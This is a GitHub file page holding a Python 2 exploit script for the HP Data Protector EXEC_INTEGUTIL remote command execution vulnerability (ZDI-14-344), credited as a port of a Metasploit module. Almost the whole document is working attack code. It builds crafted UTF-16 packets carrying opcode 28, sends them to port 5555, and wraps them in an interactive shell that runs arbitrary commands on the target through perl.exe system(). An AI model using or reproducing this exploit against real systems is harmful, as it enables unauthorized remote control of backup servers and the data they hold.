-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathhp_exploit.py
More file actions
executable file
·110 lines (97 loc) · 3.94 KB
/
hp_exploit.py
File metadata and controls
executable file
·110 lines (97 loc) · 3.94 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
#!/usr/bin/python
# (0Day) Hewlett-Packard Data Protector EXEC_INTEGUTIL Remote Command Execution Vulnerability
# https://www.zerodayinitiative.com/advisories/ZDI-14-344/
# Credit Aniway.Anyway@gmail.com, Juan Vazquez (Metasploit)
#
# Terribly ported to python by AntGarSil
#
from struct import *
import string, random, socket, unicodedata,re
####
# Generate random lowercase text of size 'size'
####
def generate_text(size, chars=string.ascii_lowercase):
return ''.join(random.choice(chars) for _ in range(size))
####
# Generate list with HP Data protector format required for EXEC_INTEGUTIL
# HP opcode for EXEC_INTEGUTIL is 28
####
def build_payload_list(cmd):
payload_list = ["2",generate_text(8),generate_text(8),generate_text(8),generate_text(8),generate_text(8), "28"]
for item in cmd:
payload_list.append(item)
return payload_list
####
# Packs payload with specific format to interact with HP Data Protector
####
def build_pkt(fields):
data = pack("!2c","\xff","\xfe")
for field in fields:
utfstring = field.encode('utf-16le') + "\x00\x00"
data+=pack("!" + `len(utfstring)`+"s",utfstring )
data+=pack("!1s"," ".encode('utf-16le')) + "\x00"
return pack("!I",len(data)-2) + data[0:len(data)-2]
####
# Sends crafted payload and prints reponse from host:port
####
def run_cmd(host,port,cmd):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.sendall(cmd)
while 1:
data = s.recv(1024)
if not data : break
print re.sub("[><a-zA-Z`~|^/\\\\]*?9.?","" ,data.decode('ascii',errors='ignore')) #Decode and print reply
s.close()
return
def escape_dir(folder):
return folder.replace('\\',"\\\\")
#return "\\\"" + folder + "\\\""
# TODO Fix this
def do_cd(cmd,old_dir):
current_dir = ''
if len(cmd) == 2:
if cmd[1][len(cmd[1])-1] != '\\':
cmd[1] = cmd[1] + '\\' #Terminate our directories in slash
print cmd[1]
if cmd[1][1] == ':' and cmd[1][2] == '\\': #Check if absolute path
current_dir = escape_dir(cmd[1])
else: #Relative path
current_dir = old_dir + escape_dir(cmd[1])
elif len(cmd) > 2: #Path probably has spaces
lastelement = len(cmd) - 1
if cmd[lastelement][len(cmd[lastelement])-1] != '\\':
cmd[lastelement] = cmd[lastelement] + '\\' #Terminate our directories in slash
print cmd[1]
if cmd[1][1] == ':' and cmd[1][2] == '\\': #Check if absolute path
current_dir = escape_dir(string.join(cmd[1:],' '))
else: #Relative path
current_dir = old_dir + escape_dir(string.join(cmd[1:],' '))
return current_dir
def interactive_shell(host,port):
current_dir = ''
while 1:
cmd = raw_input(current_dir.replace('\\\\','\\') +' $ ')
cmd_array = cmd.split()
if len(cmd_array) == 0:
print 'Enter a command'
elif cmd_array[0] == "cd":
current_dir = do_cd(cmd_array,current_dir)
elif cmd_array[0] == "exit":
exit()
else:
if current_dir:
a = ["perl.exe","-e","system(\"" + escape_dir(cmd_array[0]) + " \\\"" + current_dir + string.join(cmd_array[1:],"\\\" ") + "\")"]
else:
a = ["perl.exe","-e","system(\"" + escape_dir(cmd_array[0]) + string.join(cmd_array[1:],"\\\" ") + "\")"]
payload = ''
payload_list = build_payload_list(a)
payload = build_pkt(payload_list)
run_cmd(host,port,payload)
HOST = ''
PORT = 5555 # HP Data Protector Port
#a = ["perl.exe","-e","system('whoami.exe')"]
#payload_list = build_payload_list(a)
#payload = build_pkt(payload_list)
#run_cmd(HOST,PORT,payload)
interactive_shell(HOST,PORT)